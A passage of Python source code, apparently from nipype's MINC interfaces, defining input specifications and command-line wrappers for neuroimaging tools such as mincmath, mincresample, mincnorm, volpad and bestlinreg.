desc="Use data type of first file (default).",
argstr="-filetype",
xor=_xor_format,
)
format_byte = traits.Bool(
desc="Write out byte data.", argstr="-byte", xor=_xor_format
)
format_short = traits.Bool(
desc="Write out short integer data.", argstr="-short", xor=_xor_format
)
format_int = traits.Bool(
desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
)
format_long = traits.Bool(
desc="Superseded by -int.", argstr="-long", xor=_xor_format
)
format_float = traits.Bool(
desc="Write out single-precision floating-point data.",
argstr="-float",
xor=_xor_format,
)
format_double = traits.Bool(
desc="Write out double-precision floating-point data.",
argstr="-double",
xor=_xor_format,
)
format_signed = traits.Bool(
desc="Write signed integer data.", argstr="-signed", xor=_xor_format
)
format_unsigned = traits.Bool(
desc="Write unsigned integer data (default).",
argstr="-unsigned",
xor=_xor_format,
)
voxel_range = traits.Tuple(
traits.Int,
traits.Int,
argstr="-range %d %d",
desc="Valid range for output data.",
)
max_buffer_size_in_kb = traits.Range(
low=0,
desc="Specify the maximum size of the internal buffers (in kbytes).",
value=4096,
usedefault=True,
argstr="-max_buffer_size_in_kb %d",
)
_xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
check_dimensions = traits.Bool(
desc="Check that dimension info matches across files (default).",
argstr="-check_dimensions",
xor=_xor_check_dimensions,
)
no_check_dimensions = traits.Bool(
desc="Do not check dimension info.",
argstr="-nocheck_dimensions",
xor=_xor_check_dimensions,
)
dimension = traits.Str(
desc="Specify a dimension along which we wish to perform a calculation.",
argstr="-dimension %s",
)
# FIXME Is it sensible to use ignore_nan and propagate_nan at the same
# time? Document this.
ignore_nan = traits.Bool(
desc="Ignore invalid data (NaN) for accumulations.", argstr="-ignore_nan"
)
propagate_nan = traits.Bool(
desc="Invalid data in any file at a voxel produces a NaN (default).",
argstr="-propagate_nan",
)
# FIXME Double-check that these are mutually exclusive?
_xor_nan_zero_illegal = ("output_nan", "output_zero", "output_illegal_value")
output_nan = traits.Bool(
desc="Output NaN when an illegal operation is done (default).",
argstr="-nan",
xor=_xor_nan_zero_illegal,
)
output_zero = traits.Bool(
desc="Output zero when an illegal operation is done.",
argstr="-zero",
xor=_xor_nan_zero_illegal,
)
output_illegal = traits.Bool(
desc=(
"Value to write out when an illegal operation"
"is done. Default value: 1.79769e+308"
),
argstr="-illegal_value",
xor=_xor_nan_zero_illegal,
)
# FIXME A whole bunch of the parameters will be mutually exclusive, e.g. surely can't do sqrt and abs at the same time?
# Or does mincmath do one and then the next?
##########################################################################
# Traits that expect a bool (compare two volumes) or constant (manipulate one volume) #
##########################################################################
bool_or_const_traits = [
"test_gt",
"test_lt",
"test_eq",
"test_ne",
"test_ge",
"test_le",
"calc_add",
"calc_sub",
"calc_mul",
"calc_div",
]
test_gt = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for vol1 > vol2 or vol1 > constant.",
argstr="-gt",
)
test_lt = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for vol1 < vol2 or vol1 < constant.",
argstr="-lt",
)
test_eq = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for integer vol1 == vol2 or vol1 == constant.",
argstr="-eq",
)
test_ne = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for integer vol1 != vol2 or vol1 != const.",
argstr="-ne",
)
test_ge = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for vol1 >= vol2 or vol1 >= const.",
argstr="-ge",
)
test_le = traits.Either(
traits.Bool(),
traits.Float(),
desc="Test for vol1 <= vol2 or vol1 <= const.",
argstr="-le",
)
calc_add = traits.Either(
traits.Bool(),
traits.Float(),
desc="Add N volumes or volume + constant.",
argstr="-add",
)
calc_sub = traits.Either(
traits.Bool(),
traits.Float(),
desc="Subtract 2 volumes or volume - constant.",
argstr="-sub",
)
calc_mul = traits.Either(
traits.Bool(),
traits.Float(),
desc="Multiply N volumes or volume * constant.",
argstr="-mult",
)
calc_div = traits.Either(
traits.Bool(),
traits.Float(),
desc="Divide 2 volumes or volume / constant.",
argstr="-div",
)
######################################
# Traits that expect a single volume #
######################################
single_volume_traits = [
"invert",
"calc_not",
"sqrt",
"square",
"abs",
"exp",
"log",
"scale",
"clamp",
"segment",
"nsegment",
"isnan",
"isnan",
] # FIXME enforce this in _parse_inputs and check for other members
invert = traits.Either(
traits.Float(), desc="Calculate 1/c.", argstr="-invert -const %s"
)
calc_not = traits.Bool(desc="Calculate !vol1.", argstr="-not")
sqrt = traits.Bool(desc="Take square root of a volume.", argstr="-sqrt")
square = traits.Bool(desc="Take square of a volume.", argstr="-square")
abs = traits.Bool(desc="Take absolute value of a volume.", argstr="-abs")
exp = traits.Tuple(
traits.Float,
traits.Float,
argstr="-exp -const2 %s %s",
desc="Calculate c2*exp(c1*x). Both constants must be specified.",
)
log = traits.Tuple(
traits.Float,
traits.Float,
argstr="-log -const2 %s %s",
desc="Calculate log(x/c2)/c1. The constants c1 and c2 default to 1.",
)
scale = traits.Tuple(
traits.Float,
traits.Float,
argstr="-scale -const2 %s %s",
desc="Scale a volume: volume * c1 + c2.",
)
clamp = traits.Tuple(
traits.Float,
traits.Float,
argstr="-clamp -const2 %s %s",
desc="Clamp a volume to lie between two values.",
)
segment = traits.Tuple(
traits.Float,
traits.Float,
argstr="-segment -const2 %s %s",
desc="Segment a volume using range of -const2: within range = 1, outside range = 0.",
)
nsegment = traits.Tuple(
traits.Float,
traits.Float,
argstr="-nsegment -const2 %s %s",
desc="Opposite of -segment: within range = 0, outside range = 1.",
)
isnan = traits.Bool(desc="Test for NaN values in vol1.", argstr="-isnan")
nisnan = traits.Bool(desc="Negation of -isnan.", argstr="-nisnan")
############################################
# Traits that expect precisely two volumes #
############################################
two_volume_traits = ["percentdiff"]
percentdiff = traits.Float(
desc="Percent difference between 2 volumes, thresholded (const def=0.0).",
argstr="-percentdiff",
)
#####################################
# Traits that expect N >= 1 volumes #
#####################################
n_volume_traits = ["count_valid", "maximum", "minimum", "calc_add", "calc_or"]
count_valid = traits.Bool(
desc="Count the number of valid values in N volumes.", argstr="-count_valid"
)
maximum = traits.Bool(desc="Find maximum of N volumes.", argstr="-maximum")
minimum = traits.Bool(desc="Find minimum of N volumes.", argstr="-minimum")
calc_and = traits.Bool(desc="Calculate vol1 && vol2 (&& ...).", argstr="-and")
calc_or = traits.Bool(desc="Calculate vol1 || vol2 (|| ...).", argstr="-or")
class MathOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Math(StdOutCommandLine):
"""
Various mathematical operations supplied by mincmath.
Examples
--------
>>> from nipype.interfaces.minc import Math
>>> from nipype.interfaces.minc.testdata import minc2Dfile
Scale: volume*3.0 + 2:
>>> scale = Math(input_files=[minc2Dfile], scale=(3.0, 2))
>>> scale.run() # doctest: +SKIP
Test if >= 1.5:
>>> gt = Math(input_files=[minc2Dfile], test_gt=1.5)
>>> gt.run() # doctest: +SKIP
"""
input_spec = MathInputSpec
output_spec = MathOutputSpec
_cmd = "mincmath"
def _format_arg(self, name, spec, value):
assert value is not None
if name in self.input_spec.bool_or_const_traits:
# t is unused, what was I trying to do with it?
# t = self.inputs.__getattribute__(name)
if isinstance(value, bool) and value:
return spec.argstr
elif isinstance(value, bool) and not value:
raise ValueError(f"Does not make sense to specify {name}=False")
elif isinstance(value, float):
return f"{spec.argstr} -const {value}"
else:
raise ValueError(f"Invalid {name} argument: {value}")
return super()._format_arg(name, spec, value)
def _parse_inputs(self):
"""A number of the command line options expect precisely one or two files."""
nr_input_files = len(self.inputs.input_files)
for n in self.input_spec.bool_or_const_traits:
t = self.inputs.__getattribute__(n)
if isdefined(t):
if isinstance(t, bool):
if nr_input_files != 2:
raise ValueError(
"Due to the %s option we expected 2 files but input_files is of length %d"
% (n, nr_input_files)
)
elif isinstance(t, float):
if nr_input_files != 1:
raise ValueError(
"Due to the %s option we expected 1 file but input_files is of length %d"
% (n, nr_input_files)
)
else:
raise ValueError(
"Argument should be a bool or const, but got: %s" % t
)
for n in self.input_spec.single_volume_traits:
t = self.inputs.__getattribute__(n)
if isdefined(t):
if nr_input_files != 1:
raise ValueError(
"Due to the %s option we expected 1 file but input_files is of length %d"
% (n, nr_input_files)
)
for n in self.input_spec.two_volume_traits:
t = self.inputs.__getattribute__(n)
if isdefined(t):
if nr_input_files != 2:
raise ValueError(
"Due to the %s option we expected 2 files but input_files is of length %d"
% (n, nr_input_files)
)
for n in self.input_spec.n_volume_traits:
t = self.inputs.__getattribute__(n)
if isdefined(t):
if not nr_input_files >= 1:
raise ValueError(
"Due to the %s option we expected at least one file but input_files is of length %d"
% (n, nr_input_files)
)
return super()._parse_inputs()
class ResampleInputSpec(CommandLineInputSpec):
"""
not implemented:
-size: synonym for -nelements)
-xsize: synonym for -xnelements
-ysize: synonym for -ynelements
-zsize: synonym for -ynelements
"""
input_file = File(
desc="input file for resampling",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_resample.mnc",
)
# This is a dummy input.
input_grid_files = InputMultiPath(File, desc="input grid file(s)")
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
_xor_interpolation = (
"trilinear_interpolation",
"tricubic_interpolation",
"nearest_neighbour_interpolation",
"sinc_interpolation",
)
trilinear_interpolation = traits.Bool(
desc="Do trilinear interpolation.", argstr="-trilinear", xor=_xor_interpolation
)
tricubic_interpolation = traits.Bool(
desc="Do tricubic interpolation.", argstr="-tricubic", xor=_xor_interpolation
)
nearest_neighbour_interpolation = traits.Bool(
desc="Do nearest neighbour interpolation.",
argstr="-nearest_neighbour",
xor=_xor_interpolation,
)
sinc_interpolation = traits.Bool(
desc="Do windowed sinc interpolation.", argstr="-sinc", xor=_xor_interpolation
)
half_width_sinc_window = traits.Enum(
5,
1,
2,
3,
4,
6,
7,
8,
9,
10,
desc="Set half-width of sinc window (1-10). Default value: 5.",
argstr="-width %s",
requires=["sinc_interpolation"],
)
_xor_sinc_window_type = ("sinc_window_hanning", "sinc_window_hamming")
sinc_window_hanning = traits.Bool(
desc="Set sinc window type to Hanning.",
argstr="-hanning",
xor=_xor_sinc_window_type,
requires=["sinc_interpolation"],
)
sinc_window_hamming = traits.Bool(
desc="Set sinc window type to Hamming.",
argstr="-hamming",
xor=_xor_sinc_window_type,
requires=["sinc_interpolation"],
)
transformation = File(
desc="File giving world transformation. (Default = identity).",
exists=True,
argstr="-transformation %s",
)
invert_transformation = traits.Bool(
desc="Invert the transformation before using it.",
argstr="-invert_transformation",
)
_xor_input_sampling = ("vio_transform", "no_input_sampling")
vio_transform = traits.Bool(
desc="VIO_Transform the input sampling with the transform (default).",
argstr="-tfm_input_sampling",
xor=_xor_input_sampling,
)
no_input_sampling = traits.Bool(
desc="Use the input sampling without transforming (old behaviour).",
argstr="-use_input_sampling",
xor=_xor_input_sampling,
)
like = File(
desc="Specifies a model file for the resampling.",
argstr="-like %s",
exists=True,
)
_xor_format = (
"format_byte",
"format_short",
"format_int",
"format_long",
"format_float",
"format_double",
"format_signed",
"format_unsigned",
)
format_byte = traits.Bool(
desc="Write out byte data.", argstr="-byte", xor=_xor_format
)
format_short = traits.Bool(
desc="Write out short integer data.", argstr="-short", xor=_xor_format
)
format_int = traits.Bool(
desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
)
format_long = traits.Bool(
desc="Superseded by -int.", argstr="-long", xor=_xor_format
)
format_float = traits.Bool(
desc="Write out single-precision floating-point data.",
argstr="-float",
xor=_xor_format,
)
format_double = traits.Bool(
desc="Write out double-precision floating-point data.",
argstr="-double",
xor=_xor_format,
)
format_signed = traits.Bool(
desc="Write signed integer data.", argstr="-signed", xor=_xor_format
)
format_unsigned = traits.Bool(
desc="Write unsigned integer data (default).",
argstr="-unsigned",
xor=_xor_format,
)
output_range = traits.Tuple(
traits.Float,
traits.Float,
argstr="-range %s %s",
desc="Valid range for output data. Default value: -1.79769e+308 -1.79769e+308.",
)
_xor_slices = ("transverse", "sagittal", "coronal")
transverse_slices = traits.Bool(
desc="Write out transverse slices.", argstr="-transverse", xor=_xor_slices
)
sagittal_slices = traits.Bool(
desc="Write out sagittal slices", argstr="-sagittal", xor=_xor_slices
)
coronal_slices = traits.Bool(
desc="Write out coronal slices", argstr="-coronal", xor=_xor_slices
)
_xor_fill = ("nofill", "fill")
no_fill = traits.Bool(
desc="Use value zero for points outside of input volume.",
argstr="-nofill",
xor=_xor_fill,
)
fill = traits.Bool(
desc="Use a fill value for points outside of input volume.",
argstr="-fill",
xor=_xor_fill,
)
fill_value = traits.Float(
desc=(
"Specify a fill value for points outside of input volume."
"Default value: 1.79769e+308."
),
argstr="-fillvalue %s",
requires=["fill"],
)
_xor_scale = ("keep_real_range", "nokeep_real_range")
keep_real_range = traits.Bool(
desc="Keep the real scale of the input volume.",
argstr="-keep_real_range",
xor=_xor_scale,
)
nokeep_real_range = traits.Bool(
desc="Do not keep the real scale of the data (default).",
argstr="-nokeep_real_range",
xor=_xor_scale,
)
_xor_spacetype = ("spacetype", "talairach")
spacetype = traits.Str(
desc="Set the spacetype attribute to a specified string.",
argstr="-spacetype %s",
)
talairach = traits.Bool(desc="Output is in Talairach space.", argstr="-talairach")
origin = traits.Tuple(
traits.Float,
traits.Float,
traits.Float,
desc=(
"Origin of first pixel in 3D space."
"Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-origin %s %s %s",
)
standard_sampling = traits.Bool(
desc="Set the sampling to standard values (step, start and dircos).",
argstr="-standard_sampling",
) # FIXME Bool?
units = traits.Str(
desc="Specify the units of the output sampling.", argstr="-units %s"
) # FIXME String?
# Elements along each dimension.
# FIXME Ints? Ranges?
# FIXME Check that this xor behaves correctly.
_xor_nelements = ("nelements", "nelements_x_y_or_z")
# nr elements along each dimension
nelements = traits.Tuple(
traits.Int,
traits.Int,
traits.Int,
desc="Number of elements along each dimension (X, Y, Z).",
argstr="-nelements %s %s %s",
xor=_xor_nelements,
)
# FIXME Is mincresample happy if we only specify one of these, or do we
# need the requires=...?
xnelements = traits.Int(
desc="Number of elements along the X dimension.",
argstr="-xnelements %s",
requires=("ynelements", "znelements"),
xor=_xor_nelements,
)
ynelements = traits.Int(
desc="Number of elements along the Y dimension.",
argstr="-ynelements %s",
requires=("xnelements", "znelements"),
xor=_xor_nelements,
)
znelements = traits.Int(
desc="Number of elements along the Z dimension.",
argstr="-znelements %s",
requires=("xnelements", "ynelements"),
xor=_xor_nelements,
)
# step size along each dimension
_xor_step = ("step", "step_x_y_or_z")
step = traits.Tuple(
traits.Int,
traits.Int,
traits.Int,
desc="Step size along each dimension (X, Y, Z). Default value: (0, 0, 0).",
argstr="-step %s %s %s",
xor=_xor_nelements,
)
# FIXME Use the requires=...?
xstep = traits.Int(
desc="Step size along the X dimension. Default value: 0.",
argstr="-xstep %s",
requires=("ystep", "zstep"),
xor=_xor_step,
)
ystep = traits.Int(
desc="Step size along the Y dimension. Default value: 0.",
argstr="-ystep %s",
requires=("xstep", "zstep"),
xor=_xor_step,
)
zstep = traits.Int(
desc="Step size along the Z dimension. Default value: 0.",
argstr="-zstep %s",
requires=("xstep", "ystep"),
xor=_xor_step,
)
# start point along each dimension
_xor_start = ("start", "start_x_y_or_z")
start = traits.Tuple(
traits.Float,
traits.Float,
traits.Float,
desc=(
"Start point along each dimension (X, Y, Z)."
"Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-start %s %s %s",
xor=_xor_nelements,
)
# FIXME Use the requires=...?
xstart = traits.Float(
desc="Start point along the X dimension. Default value: 1.79769e+308.",
argstr="-xstart %s",
requires=("ystart", "zstart"),
xor=_xor_start,
)
ystart = traits.Float(
desc="Start point along the Y dimension. Default value: 1.79769e+308.",
argstr="-ystart %s",
requires=("xstart", "zstart"),
xor=_xor_start,
)
zstart = traits.Float(
desc="Start point along the Z dimension. Default value: 1.79769e+308.",
argstr="-zstart %s",
requires=("xstart", "ystart"),
xor=_xor_start,
)
# dircos along each dimension
_xor_dircos = ("dircos", "dircos_x_y_or_z")
dircos = traits.Tuple(
traits.Float,
traits.Float,
traits.Float,
desc=(
"Direction cosines along each dimension (X, Y, Z). Default value:"
"1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308 ..."
" 1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-dircos %s %s %s",
xor=_xor_nelements,
)
# FIXME Use the requires=...?
xdircos = traits.Float(
desc=(
"Direction cosines along the X dimension."
"Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-xdircos %s",
requires=("ydircos", "zdircos"),
xor=_xor_dircos,
)
ydircos = traits.Float(
desc=(
"Direction cosines along the Y dimension."
"Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-ydircos %s",
requires=("xdircos", "zdircos"),
xor=_xor_dircos,
)
zdircos = traits.Float(
desc=(
"Direction cosines along the Z dimension."
"Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
),
argstr="-zdircos %s",
requires=("xdircos", "ydircos"),
xor=_xor_dircos,
)
class ResampleOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Resample(StdOutCommandLine):
"""
Resample a minc file.'
Examples
--------
>>> from nipype.interfaces.minc import Resample
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> r = Resample(input_file=minc2Dfile, output_file='/tmp/out.mnc') # Resample the file.
>>> r.run() # doctest: +SKIP
"""
input_spec = ResampleInputSpec
output_spec = ResampleOutputSpec
_cmd = "mincresample"
class NormInputSpec(CommandLineInputSpec):
"""
Not implemented:
-version print version and exit
-verbose be verbose
-noverbose opposite of -verbose [default]
-quiet be quiet
-noquiet opposite of -quiet [default]
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
"""
input_file = File(
desc="input file to normalise",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_norm.mnc",
)
output_threshold_mask = File(
desc="File in which to store the threshold mask.",
argstr="-threshold_mask %s",
name_source=["input_file"],
hash_files=False,
name_template="%s_norm_threshold_mask.mnc",
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# Normalisation Options
mask = File(
desc="Calculate the image normalisation within a mask.",
argstr="-mask %s",
exists=True,
)
clamp = traits.Bool(
desc="Force the output range between limits [default].",
argstr="-clamp",
usedefault=True,
default_value=True,
)
cutoff = traits.Range(
low=0.0,
high=100.0,
desc="Cutoff value to use to calculate thresholds by a histogram PcT in %. [default: 0.01]",
argstr="-cutoff %s",
)
lower = traits.Float(desc="Lower real value to use.", argstr="-lower %s")
upper = traits.Float(desc="Upper real value to use.", argstr="-upper %s")
out_floor = traits.Float(
desc="Output files maximum [default: 0]", argstr="-out_floor %s"
) # FIXME is this a float?
out_ceil = traits.Float(
desc="Output files minimum [default: 100]", argstr="-out_ceil %s"
) # FIXME is this a float?
# Threshold Options
threshold = traits.Bool(
desc="Threshold the image (set values below threshold_perc to -out_floor).",
argstr="-threshold",
)
threshold_perc = traits.Range(
low=0.0,
high=100.0,
desc="Threshold percentage (0.1 == lower 10% of intensity range) [default: 0.1].",
argstr="-threshold_perc %s",
)
threshold_bmt = traits.Bool(
desc="Use the resulting image BiModalT as the threshold.",
argstr="-threshold_bmt",
)
threshold_blur = traits.Float(
desc="Blur FWHM for intensity edges then thresholding [default: 2].",
argstr="-threshold_blur %s",
)
class NormOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
output_threshold_mask = File(desc="threshold mask file")
class Norm(CommandLine):
"""Normalise a file between a max and minimum (possibly)
using two histogram pct's.
Examples
--------
>>> from nipype.interfaces.minc import Norm
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> n = Norm(input_file=minc2Dfile, output_file='/tmp/out.mnc') # Normalise the file.
>>> n.run() # doctest: +SKIP
"""
input_spec = NormInputSpec
output_spec = NormOutputSpec
_cmd = "mincnorm"
"""
| volcentre will centre a MINC image's sampling about a point (0,0,0 typically)
|
| NB: It will modify the file in-place unless an outfile is given
|
| Problems or comments should be sent to: a.janke@gmail.com
Summary of options:
-version print version and exit
-verbose be verbose
-noverbose opposite of -verbose [default]
-clobber clobber existing check files
-noclobber opposite of -clobber [default]
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
-com Use the CoM of the volume for the new centre (via mincstats)
-nocom opposite of -com [default]
-centre <float> <float> <float>
Centre to use (x,y,z) [default: 0 0 0]
-zero_dircos Set the direction cosines to identity [default]
-nozero_dirco opposite of -zero_dircos
Usage: volcentre [options] <infile.mnc> [<outfile.mnc>]
volcentre -help to list options
"""
class VolcentreInputSpec(CommandLineInputSpec):
"""
Not implemented:
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
"""
input_file = File(
desc="input file to centre",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_volcentre.mnc",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
com = traits.Bool(
desc="Use the CoM of the volume for the new centre (via mincstats). Default: False",
argstr="-com",
)
centre = traits.Tuple(
traits.Float,
traits.Float,
traits.Float,
argstr="-centre %s %s %s",
desc="Centre to use (x,y,z) [default: 0 0 0].",
)
zero_dircos = traits.Bool(
desc="Set the direction cosines to identity [default].", argstr="-zero_dircos"
)
class VolcentreOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Volcentre(CommandLine):
"""Centre a MINC image's sampling about a point, typically (0,0,0).
Example
--------
>>> from nipype.interfaces.minc import Volcentre
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> vc = Volcentre(input_file=minc2Dfile)
>>> vc.run() # doctest: +SKIP
"""
input_spec = VolcentreInputSpec
output_spec = VolcentreOutputSpec
_cmd = "volcentre"
class VolpadInputSpec(CommandLineInputSpec):
"""
Not implemented:
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
| volpad pads a MINC volume
|
| Problems or comments should be sent to: a.janke@gmail.com
Summary of options:
-- General Options -------------------------------------------------------------
-verbose be verbose
-noverbose opposite of -verbose [default]
-clobber clobber existing files
-noclobber opposite of -clobber [default]
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
"""
input_file = File(
desc="input file to centre",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_volpad.mnc",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
auto = traits.Bool(
desc="Automatically determine padding distances (uses -distance as max). Default: False.",
argstr="-auto",
)
auto_freq = traits.Float(
desc="Frequency of voxels over bimodalt threshold to stop at [default: 500].",
argstr="-auto_freq %s",
)
distance = traits.Int(
desc="Padding distance (in voxels) [default: 4].", argstr="-distance %s"
)
smooth = traits.Bool(
desc="Smooth (blur) edges before padding. Default: False.", argstr="-smooth"
)
smooth_distance = traits.Int(
desc="Smoothing distance (in voxels) [default: 4].",
argstr="-smooth_distance %s",
)
class VolpadOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Volpad(CommandLine):
"""Centre a MINC image's sampling about a point, typically (0,0,0).
Examples
--------
>>> from nipype.interfaces.minc import Volpad
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> vp = Volpad(input_file=minc2Dfile, smooth=True, smooth_distance=4)
>>> vp.run() # doctest: +SKIP
"""
input_spec = VolpadInputSpec
output_spec = VolpadOutputSpec
_cmd = "volpad"
class VolisoInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to convert to isotropic sampling",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_voliso.mnc",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="--verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="--clobber",
usedefault=True,
default_value=True,
)
maxstep = traits.Float(
desc="The target maximum step desired in the output volume.",
argstr="--maxstep %s",
)
minstep = traits.Float(
desc="The target minimum step desired in the output volume.",
argstr="--minstep %s",
)
avgstep = traits.Bool(
desc="Calculate the maximum step from the average steps of the input volume.",
argstr="--avgstep",
)
class VolisoOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Voliso(CommandLine):
"""Changes the steps and starts in order that the output volume
has isotropic sampling.
Examples
--------
>>> from nipype.interfaces.minc import Voliso
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> viso = Voliso(input_file=minc2Dfile, minstep=0.1, avgstep=True)
>>> viso.run() # doctest: +SKIP
"""
input_spec = VolisoInputSpec
output_spec = VolisoOutputSpec
_cmd = "voliso"
class GennlxfmInputSpec(CommandLineInputSpec):
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["like"],
hash_files=False,
name_template="%s_gennlxfm.xfm",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
ident = traits.Bool(
desc="Generate an identity xfm. Default: False.", argstr="-ident"
)
step = traits.Int(desc="Output ident xfm step [default: 1].", argstr="-step %s")
like = File(desc="Generate a nlxfm like this file.", exists=True, argstr="-like %s")
class GennlxfmOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
output_grid = File(desc="output grid", exists=True)
class Gennlxfm(CommandLine):
"""Generate nonlinear xfms. Currently only identity xfms
are supported!
This tool is part of minc-widgets:
https://github.com/BIC-MNI/minc-widgets/blob/master/gennlxfm/gennlxfm
Examples
--------
>>> from nipype.interfaces.minc import Gennlxfm
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> gennlxfm = Gennlxfm(step=1, like=minc2Dfile)
>>> gennlxfm.run() # doctest: +SKIP
"""
input_spec = GennlxfmInputSpec
output_spec = GennlxfmOutputSpec
_cmd = "gennlxfm"
def _list_outputs(self):
outputs = super()._list_outputs()
outputs["output_grid"] = re.sub(
".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
)
return outputs
class XfmConcatInputSpec(CommandLineInputSpec):
input_files = InputMultiPath(
File(exists=True),
desc="input file(s)",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
)
# This is a dummy input.
input_grid_files = InputMultiPath(File, desc="input grid file(s)")
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_files"],
hash_files=False,
name_template="%s_xfmconcat.xfm",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
class XfmConcatOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
output_grids = OutputMultiPath(File(exists=True), desc="output grids")
class XfmConcat(CommandLine):
"""Concatenate transforms together. The output transformation
is equivalent to applying input1.xfm, then input2.xfm, ..., in
that order.
Examples
--------
>>> from nipype.interfaces.minc import XfmConcat
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> conc = XfmConcat(input_files=['input1.xfm', 'input1.xfm'])
>>> conc.run() # doctest: +SKIP
"""
input_spec = XfmConcatInputSpec
output_spec = XfmConcatOutputSpec
_cmd = "xfmconcat"
def _list_outputs(self):
outputs = super()._list_outputs()
if os.path.exists(outputs["output_file"]):
if "grid" in open(outputs["output_file"]).read():
outputs["output_grids"] = glob.glob(
re.sub(".(nlxfm|xfm)$", "_grid_*.mnc", outputs["output_file"])
)
return outputs
class BestLinRegInputSpec(CommandLineInputSpec):
source = File(
desc="source Minc file", exists=True, mandatory=True, argstr="%s", position=-4
)
target = File(
desc="target Minc file", exists=True, mandatory=True, argstr="%s", position=-3
)
output_xfm = File(
desc="output xfm file",
genfile=True,
argstr="%s",
position=-2,
name_source=["source"],
hash_files=False,
name_template="%s_bestlinreg.xfm",
keep_extension=False,
)
output_mnc = File(
desc="output mnc file",
genfile=True,
argstr="%s",
position=-1,
name_source=["source"],
hash_files=False,
name_template="%s_bestlinreg.mnc",
keep_extension=False,
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# FIXME Very bare implementation, none of these are done yet:
"""
-init_xfm initial transformation (default identity)
-source_mask source mask to use during fitting
-target_mask target mask to use during fitting
-lsq9 use 9-parameter transformation (default)
-lsq12 use 12-parameter transformation (default -lsq9)
-lsq6 use 6-parameter transformation
"""
class BestLinRegOutputSpec(TraitedSpec):
output_xfm = File(desc="output xfm file", exists=True)
output_mnc = File(desc="output mnc file", exists=True)
class BestLinReg(CommandLine):
"""Hierachial linear fitting between two files.
The bestlinreg script is part of the EZminc package:
https://github.com/BIC-MNI/EZminc/blob/master/scripts/bestlinreg.pl
Examples
--------
>>> from nipype.interfaces.minc import BestLinReg
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> input_file = nonempty_minc_data(0)
>>> target_file = nonempty_minc_data(1)
>>> linreg = BestLinReg(source=input_file, target=target_file)
